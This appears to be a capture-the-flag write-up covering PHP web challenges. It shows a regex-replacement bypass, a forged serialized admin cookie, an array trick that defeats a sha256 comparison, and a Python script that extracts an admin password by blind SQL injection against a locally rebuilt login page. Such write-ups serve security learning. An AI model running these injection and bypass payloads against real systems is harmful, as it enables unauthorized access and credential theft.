description |
---|
Note : A JOURNEY TO GAIN KNOWLEDGE |
Web Challenge
<?php
if (isset($_GET['bingus'])) {
$input = $_GET['bingus'];
$to_replace = 'bingus';
$clean_string = preg_replace("/$to_replace/", '', $input);
echo "<p>Your string is: $clean_string</p>";
if ($clean_string == $to_replace) {
echo "<h2 class=\"answer\">Bingus <span style=\"color: green;\">IS</span> your beloved</h2>";
output_flag();
} else {
echo "<h2 class=\"answer\">Bingus <span style=\"color: red;\">IS NOT</span> your beloved</h2>";
}
}
?>
- Notice that $clean_string genererated by replacing
- So that we just input something that after replacing. it's equal to 'bingus'
demo:
class User
{
public $role = 'Admin';
}
$default_user = new User;
$_COOKIE = serialize($default_user);
setcookie(
'user',
serialize($default_user)
);
$a=unserialize($_COOKIE);
echo "$_COOKIE"
<?php
if (isset($_GET['input1']) and isset($_GET['input2'])) {
if ($_GET['input1'] == $_GET['input2']) {
print '<h3 class="error">Nice try, but it won\'t be that easy ;)</h3>';
} else if (hash("sha256", $_GET['input1']) === hash("sha256", $_GET['input2'])) {
output_flag();
} else {
print '<h3 class="error">Your inputs don\'t match</h3>';
}
}
?>
<p>See if you can make the sha256 hashes match</p>
<br />
<a href="/php3/index.php?source=true">Source Code</a>
<form method="get">
<input type="text" required name="input1" placeholder="Input 1" />
<p>Hash: <?php if (isset($_GET['input1'])) print hash("sha256", $_GET['input1']) ?></p>
<input type="text" required name="input2" placeholder="Input 2" />
<p>Hash: <?php if (isset($_GET['input2'])) print hash("sha256", $_GET['input2']) ?></p>
<input type="submit" />
</form>
</body>
</html>
<?php
Workflow:
- At first, i just try to find around the key work "SHA256 collision" but we got this one , it takes about ≈3.6×1013 years to find, so that it's not a practical option.
- After that i focused on '==' in php. Searching around and i got this and this
- Now you just put [] in input and get flag.
This challenge ended and the website was turned off. So i build it in docker from here
- when you connectn try to see history in burpsuite, you can get the link redirect to the login page
- Now read the hint with 'admin' in user and password does't have fillter so that mean that may be SQLI. Exactly. that's is blind SQLI
- I solve this challenge by burpsuite as same as this lab
otherway, try to bruteforce by python request:
import requests, string
url = "http://localhost:49153/fff5bf676ba8796f0c51033403b35311/login"
s = requests.session()
passwordRetrieve = ""
# ' or (select 'a' from users where username='admin' and length(Password)>36)='a
def solve():
global passwordRetrieve
index = 0
while True:
for char in string.printable:
usernamefield = "\\"
passwordfield = f"' or (select 'a' from users where username='admin' and substr(Password,{index},1)='{char}')='a"
postParam = {'user': usernamefield, 'pass': passwordfield}
response = s.post(url, data=postParam).text
if "Invalid" not in response:
passwordRetrieve += char
index += 1
print(passwordRetrieve)
break
if (index == 37):
break
SELECT * from users WHERE username='admin\' AND Password = ''or 'True'
solve()
Thanks for reading. Have a good day ❤️ !
Contact: